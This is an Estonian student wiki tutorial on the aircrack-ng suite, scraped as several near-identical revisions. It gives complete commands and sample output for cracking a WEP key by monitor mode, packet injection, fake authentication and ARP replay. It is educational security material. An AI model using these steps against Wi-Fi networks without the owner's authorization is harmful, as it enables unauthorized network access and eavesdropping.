aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T20:13:13Z

Ktragel: /* Kokkuvõte */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T20:03:33Z

Ktragel: /* Üldkirjeldus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

